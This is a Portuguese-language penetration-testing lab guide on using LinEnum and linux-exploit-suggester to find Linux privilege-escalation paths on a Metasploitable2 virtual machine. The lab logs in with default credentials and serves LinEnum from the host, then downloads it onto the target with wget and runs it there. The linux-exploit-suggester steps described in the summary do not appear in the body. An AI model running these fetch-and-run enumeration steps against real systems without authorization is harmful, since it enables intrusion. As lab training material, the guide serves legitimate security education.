Introdução
Neste laboratório, exploraremos duas das ferramentas de automação de escalonamento de privilégios Linux mais comumente usadas - LinEnum e linux-exploit-suggester. O objetivo é aprender a usar essas ferramentas de forma eficaz para acelerar o processo de escalonamento de privilégios durante um teste de penetração ou avaliação de segurança. Dominar essas ferramentas pode economizar significativamente tempo e esforço, permitindo que você se concentre na compreensão dos princípios e metodologias subjacentes ao escalonamento de privilégios.
Configurando o Ambiente
Nesta etapa, configuraremos a máquina virtual Metasploitable2, que servirá como nosso sistema alvo. Siga as instruções abaixo para iniciar a máquina virtual e estabelecer uma conexão:
Em nosso ambiente de laboratório, a configuração da máquina virtual Metasploitable2 já foi pré-configurada. Você pode iniciar a máquina virtual e conectar-se a ela usando as seguintes etapas:
Abra um terminal e execute o seguinte comando para iniciar a máquina virtual Metasploitable2:
sudo virsh start Metasploitable2Aguarde 1-2 minutos até que a máquina virtual seja totalmente inicializada e esteja pronta.
Verifique se você consegue fazer ping no endereço IP do Metasploitable2 (192.168.122.102) a partir da sua máquina host.
Use o seguinte comando para conectar-se à máquina virtual Metasploitable2 via SSH:
ssh msfadmin@192.168.122.102Na primeira conexão, você será solicitado a aceitar a autenticidade do host. Digite
yese pressioneEnterpara continuar.Em seguida, insira a senha
msfadminquando solicitado:msfadmin
Após a autenticação bem-sucedida, você deverá ter uma sessão de shell com poucos privilégios na máquina virtual Metasploitable2.
LinEnum: Automatizando a Enumeração de Sistemas Linux
LinEnum é um script poderoso que automatiza o processo de enumeração em um sistema Linux, reunindo informações valiosas que podem auxiliar no processo de escalonamento de privilégios. Siga as etapas abaixo para usar o LinEnum na máquina virtual Metasploitable2:
Em sua máquina host, abra um terminal e navegue até o diretório
/tmp:cd /tmpHá um script chamado
LinEnum.shno diretório/tmpdo projeto.Inicie um servidor HTTP Python no diretório
/tmppara hospedar o script LinEnum:python3 -m http.server 8000Na
VM Metasploitable2, navegue até o diretório/tmpe baixe o script LinEnum usandowgetdo servidor HTTP Python em execução em sua máquina host:Navegue até o diretório
/tmp:cd /tmpwget 192.168.122.1:8000/LinEnum.sh -P /tmpTorne o script LinEnum executável:
chmod +x LinEnum.shExecute o script LinEnum e redirecione a saída para um arquivo para análise posterior:
LinEnum.sh > linenum_output.txt
LinEnum realizará várias verificações e enumerará informações do sistema, destacando potenciais vulnerabilidades ou configurações incorretas em texto amarelo. Preste muita atenção a essas áreas destacadas, pois elas podem revelar oportunidades para escalonamento de privilégios.
Resumo
Neste laboratório, aprendemos como usar duas ferramentas de automação poderosas, LinEnum e linux-exploit-suggester, para auxiliar no processo de escalonamento de privilégios em sistemas Linux. O LinEnum fornece uma enumeração abrangente das informações do sistema, destacando potenciais vulnerabilidades e configurações incorretas. A ferramenta linux-exploit-suggester analisa a versão do kernel e sugere exploits de kernel relevantes que podem levar ao escalonamento de privilégios.
Ao alavancar essas ferramentas, podemos otimizar as fases de coleta e análise de informações, economizando tempo valioso durante um teste de penetração ou avaliação de segurança. No entanto, é crucial entender que essas ferramentas são destinadas a auxiliar no processo, e uma sólida compreensão das técnicas e metodologias de escalonamento de privilégios ainda é essencial para uma exploração bem-sucedida.
Ao longo deste laboratório, praticamos a configuração de um ambiente de máquina virtual vulnerável, o download e a execução dos scripts LinEnum e linux-exploit-suggester e a interpretação de suas saídas. A experiência prática obtida neste laboratório será inestimável em cenários do mundo real, onde o escalonamento de privilégios eficiente e eficaz é uma habilidade crítica para hackers éticos e profissionais de segurança.